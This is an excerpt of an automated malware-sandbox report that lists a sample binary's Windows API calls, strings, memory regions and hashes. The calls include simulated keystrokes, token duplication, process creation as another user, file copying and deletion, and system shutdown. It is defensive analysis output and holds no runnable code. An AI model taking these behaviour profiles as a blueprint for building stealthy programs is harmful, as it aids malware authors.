                                                                                        • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                                        • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                                                                                        • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                                        • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                                                                                        APIs
                                                                                        • GetForegroundWindow.USER32 ref: 00434420
                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                                                                        • IsIconic.USER32(?), ref: 0043444F
                                                                                        • ShowWindow.USER32(?,00000009), ref: 0043445C
                                                                                        • SetForegroundWindow.USER32(?), ref: 0043446A
                                                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00434485
                                                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                                                                        • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                                                                        • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                                                                        • keybd_event.USER32(00000012,00000000), ref: 004344CF
                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                                                                        • keybd_event.USER32(00000012,00000000), ref: 004344E6
                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                                                                        • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                                                                        • keybd_event.USER32(00000012,00000000), ref: 00434514
                                                                                        • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                                                                        • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                        • String ID: Shell_TrayWnd
                                                                                        • API String ID: 2889586943-2988720461
                                                                                        • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                                        • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                                                                        • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                                        • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                                                                        APIs
                                                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                                                                        • CloseHandle.KERNEL32(?), ref: 004463A0
                                                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                                                                        • GetProcessWindowStation.USER32 ref: 004463D1
                                                                                        • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                                                                        • _wcslen.LIBCMT ref: 00446498
                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                        • _wcsncpy.LIBCMT ref: 004464C0
                                                                                        • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                                                                        • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                                                                        • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                                                                        • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                                                                        • CloseWindowStation.USER32(00000000), ref: 0044656C
                                                                                        • CloseDesktop.USER32(?), ref: 0044657A
                                                                                        • SetProcessWindowStation.USER32(?), ref: 00446588
                                                                                        • CloseHandle.KERNEL32(?), ref: 00446592
                                                                                        • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                                                                                        • String ID: $@OH$default$winsta0
                                                                                        • API String ID: 3324942560-3791954436
                                                                                        • Opcode ID: 32b69c4791a7470fa0b80647bfdf086b52c1a9ae88e861a394681d1362ebb5d4
                                                                                        • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                                                                                        • Opcode Fuzzy Hash: 32b69c4791a7470fa0b80647bfdf086b52c1a9ae88e861a394681d1362ebb5d4
                                                                                        • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                                                                                        APIs
                                                                                          • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                                          • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 0043392E
                                                                                          • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 00433950
                                                                                          • Part of subcall function 00433908: __wcsicoll.LIBCMT ref: 00433974
                                                                                          • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                        • _wcscat.LIBCMT ref: 0044BD94
                                                                                        • _wcscat.LIBCMT ref: 0044BDBD
                                                                                        • __wsplitpath.LIBCMT ref: 0044BDEA
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0044BE02
                                                                                        • _wcscpy.LIBCMT ref: 0044BE71
                                                                                        • _wcscat.LIBCMT ref: 0044BE83
                                                                                        • _wcscat.LIBCMT ref: 0044BE95
                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC1
                                                                                        • DeleteFileW.KERNEL32(?), ref: 0044BED3
                                                                                        • MoveFileW.KERNEL32(?,?), ref: 0044BEF3
                                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0A
                                                                                        • DeleteFileW.KERNEL32(?), ref: 0044BF15
                                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2C
                                                                                        • FindClose.KERNEL32(00000000), ref: 0044BF33
                                                                                        • MoveFileW.KERNEL32(?,?), ref: 0044BF4F
                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF64
                                                                                        • FindClose.KERNEL32(00000000), ref: 0044BF7C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                                                                                        • String ID: \*.*
                                                                                        • API String ID: 2188072990-1173974218
                                                                                        • Opcode ID: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                                                        • Instruction ID: 72a2fd59153234373391f972af8bc7e503bf673df65afccb4f4ecee040a4f935
                                                                                        • Opcode Fuzzy Hash: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                                                        • Instruction Fuzzy Hash: E25167B2408384AAD734DB50DC45EDF73E9AFC8304F544E1EF68982141EB75D249CBA6
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                                                                        • FindClose.KERNEL32(00000000), ref: 00478924
                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                                                                        • __swprintf.LIBCMT ref: 004789D3
                                                                                        • __swprintf.LIBCMT ref: 00478A1D
                                                                                        • __swprintf.LIBCMT ref: 00478A4B
                                                                                        • __swprintf.LIBCMT ref: 00478A79
                                                                                          • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                                                                          • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                                                                                        • __swprintf.LIBCMT ref: 00478AA7
                                                                                        • __swprintf.LIBCMT ref: 00478AD5
                                                                                        • __swprintf.LIBCMT ref: 00478B03
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                                                                        • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                        • API String ID: 999945258-2428617273
                                                                                        • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                                        • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                                                                                        • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                                        • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                                                                                        APIs
                                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                                        • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                                        • __wsplitpath.LIBCMT ref: 00403492
                                                                                          • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                        • _wcscpy.LIBCMT ref: 004034A7
                                                                                        • _wcscat.LIBCMT ref: 004034BC
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                          • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                          • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                                                                          • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                                                                        • _wcscpy.LIBCMT ref: 004035A0
                                                                                        • _wcslen.LIBCMT ref: 00403623
                                                                                        • _wcslen.LIBCMT ref: 0040367D
                                                                                        Strings
                                                                                        • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                                                                        • _, xrefs: 0040371C
                                                                                        • Unterminated string, xrefs: 00428348
                                                                                        • Error opening the file, xrefs: 00428231
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                                                                        • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                                                        • API String ID: 3393021363-188983378
                                                                                        • Opcode ID: c550b98b6bcab5fdf06a222782fa93f3142e9b4cafeed1e945fcb525179e639f
                                                                                        • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                                                                        • Opcode Fuzzy Hash: c550b98b6bcab5fdf06a222782fa93f3142e9b4cafeed1e945fcb525179e639f
                                                                                        • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                                                                        • FindClose.KERNEL32(00000000), ref: 00431B20
                                                                                        • FindClose.KERNEL32(00000000), ref: 00431B34
                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                                                                        • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                                                                        • FindClose.KERNEL32(00000000), ref: 00431BCD
                                                                                        • FindClose.KERNEL32(00000000), ref: 00431BDB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                        • String ID: *.*
                                                                                        • API String ID: 1409584000-438819550
                                                                                        • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                                        • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                                                                        • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                                        • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                                                                        APIs
                                                                                        • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                                                                        • __swprintf.LIBCMT ref: 00431C2E
                                                                                        • _wcslen.LIBCMT ref: 00431C3A
                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                                                                                        • String ID: :$\$\??\%s
                                                                                        • API String ID: 2192556992-3457252023
                                                                                        • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                                        • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                                                                                        • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                                        • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                                                                                        APIs
                                                                                        • GetLocalTime.KERNEL32(?), ref: 004722A2
                                                                                        • __swprintf.LIBCMT ref: 004722B9
                                                                                        • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                                                                        • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                                                                        • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                                                                        • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                                                                        • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                                                                        • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                                                                        • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                                                                        • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                                                                        • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: FolderPath$LocalTime__swprintf
                                                                                        • String ID: %.3d
                                                                                        • API String ID: 3337348382-986655627
                                                                                        • Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                                                        • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                                                                                        • Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                                                        • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                                                                        • FindClose.KERNEL32(00000000), ref: 0044291C
                                                                                        • FindClose.KERNEL32(00000000), ref: 00442930
                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                                                                        • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                                                                        • FindClose.KERNEL32(00000000), ref: 004429D4
                                                                                          • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                                                                        • FindClose.KERNEL32(00000000), ref: 004429E2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                        • String ID: *.*
                                                                                        • API String ID: 2640511053-438819550
                                                                                        • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                                        • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                                                                                        • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                                        • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                                                                        • GetLastError.KERNEL32 ref: 00433414
                                                                                        • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                                                                        • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                                                                        • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                                                        • String ID: SeShutdownPrivilege
                                                                                        • API String ID: 2938487562-3733053543
                                                                                        • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
